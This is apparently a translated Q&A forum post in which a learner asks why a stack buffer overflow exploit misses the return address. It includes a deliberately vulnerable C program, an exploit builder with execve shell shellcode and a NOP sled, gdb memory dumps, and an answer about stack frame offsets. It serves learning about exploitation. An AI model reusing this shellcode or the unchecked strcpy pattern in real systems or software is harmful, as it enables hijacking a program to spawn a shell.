缓冲区溢出shellcode覆盖错误的地址

时间:2018-10-25 14:28:41

标签: c security buffer-overflow shellcode

  

注意:这是我原始帖子here的修改版本,但   提出了一个稍微不同的问题。

我在缓冲区溢出时正在经历此video,但是在复制演示时遇到了一些麻烦。问题似乎是当我执行溢出时,预期的返回地址没有被覆盖。

据我了解,预期的寄信人地址应为0x7fffffffe060

  

此内存地址格式与我在演示等中看到的格式不同。   这里有什么问题吗?

gcc命令-gcc -ggdb -fno-stack-protector -mpreferred-stack-boundary=4 -o Output Output.c

我可以看到将shellcode引入堆栈中,但是它是我期望的位置以下的“行”或内存地址。

期望,带有我的shellcode:

0x7fffffffe060: 0x6850c031  0x68732f6e  0x622f2f68  0x99e38969

实际结果:

0x7fffffffe060: 0xffffe1a8  0x00007fff  0xffffe096  0x00000002
0x7fffffffe070: 0x6850c031  0x68732f6e  0x622f2f68  0x99e38969

为什么目标返回地址0x7fffffffe060不会被0x7fffffffe070覆盖?

ExploitMe.c

#include<stdio.h>
#include<string.h>

main(int argc, char **argv)
{
    char buffer[80];
    strcpy(buffer, argv[1]);
    return 1;
}

HackYou.c

#include<stdio.h>
#include<stdlib.h>
#include<string.h>

char shellcode[] =
"\x31\xc0"
"\x50"
"\x68\x6e\x2f\x73\x68"
"\x68\x2f\x2f\x62\x69"
"\x89\xe3"
"\x99"
"\x52"
"\x53"
"\x89\xe1"
"\xb0\x0b"
"\xcd\x80"
;

char retaddr[] = "\x60\xe0\xff\xff\xff\x7f";

#define NOP 0x90
main()
{
    char buffer[96]; 
    memset(buffer, NOP, 96);
    memcpy(buffer, "EGG=", 4);
    memcpy(buffer+4, shellcode, 24);
    memcpy(buffer+88, retaddr, 4);
    memcpy(buffer+92, "\x00\x00\x00\x00", 4);
    putenv(buffer);
    system("/bin/sh");
    return 0;
}

(gdb) run $EGG

(gdb) x/24xw $rsp
0x7fffffffe060: 0xffffe1a8  0x00007fff  0xffffe096  0x00000002
0x7fffffffe070: 0x00000001  0x00000000  0xf7e939b5  0x00007fff
0x7fffffffe080: 0x00000000  0x00000000  0x555551bd  0x00005555
0x7fffffffe090: 0xf7fe42a0  0x00007fff  0x00000000  0x00000000
0x7fffffffe0a0: 0x55555170  0x00005555  0x55555050  0x00005555
0x7fffffffe0b0: 0xffffe1a0  0x00007fff  0x00000000  0x00000000

(gdb) c
Continuing.

(gdb) x/24xw argv[1]
0x7fffffffe4c4: 0x6850c031  0x68732f6e  0x622f2f68  0x99e38969
0x7fffffffe4d4: 0xe1895352  0x80cd0bb0  0x90909090  0x90909090
0x7fffffffe4e4: 0x90909090  0x90909090  0x90909090  0x90909090
0x7fffffffe4f4: 0x90909090  0x90909090  0x90909090  0x90909090
0x7fffffffe504: 0x90909090  0x90909090  0x90909090  0x90909090
0x7fffffffe514: 0x90909090  0xffffe060  0x5f534c00  0x4f4c4f43

(gdb) x/34xw $rsp
0x7fffffffe060: 0xffffe1a8  0x00007fff  0xffffe096  0x00000002
0x7fffffffe070: 0x6850c031  0x68732f6e  0x622f2f68  0x99e38969
0x7fffffffe080: 0xe1895352  0x80cd0bb0  0x90909090  0x90909090
0x7fffffffe090: 0x90909090  0x90909090  0x90909090  0x90909090
0x7fffffffe0a0: 0x90909090  0x90909090  0x90909090  0x90909090
0x7fffffffe0b0: 0x90909090  0x90909090  0x90909090  0x90909090
0x7fffffffe0c0: 0x90909090  0xffffe060  0xf7e14b00  0x00007fff
0x7fffffffe0d0: 0x00000000  0x00000000  0xffffe1a8  0x00007fff
0x7fffffffe0e0: 0x00040000  0x00000002  

(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x00007ffff7e14b0d in __libc_start_main (main=0x555555555135 <main>, argc=2, argv=0x7fffffffe1a8, init=<optimized out>, 
    fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe198) at ../csu/libc-start.c:310
310 ../csu/libc-start.c: No such file or directory.

1 个答案:

答案 0 :(得分:0)

我还没有看过您的视频,但是您使用的方法高度依赖于编译器的版本,编译选项甚至操作系统的版本。如果您缺少目标,则可能是因为调试选项(-g)。调试选项通常会使编译器安装可靠的堆栈框架,以便调试器可以可靠地遍历调用堆栈。

在您的示例中,您期望返回地址距缓冲区地址92字节,或距缓冲区末尾3个堆栈地址。因此,如果您拆解ExploitMe.c:main(),则序言是什么样的?推送了多少个寄存器,并且从rsp中减去了什么?

在(ubuntu 18,gcc 7.3)上,我得到了1次推送并减去了96,所以返回地址位于距缓冲区偏移104处;保存的堆栈指针在偏移量96处。 当我用-O替换-ggdb时,返回地址位于偏移量88 [因此92将是中间或最高有效字节],并且没有保存的堆栈指针。

就像评论者指出的那样,如果您要利用未记录的行为,则必须能够适应。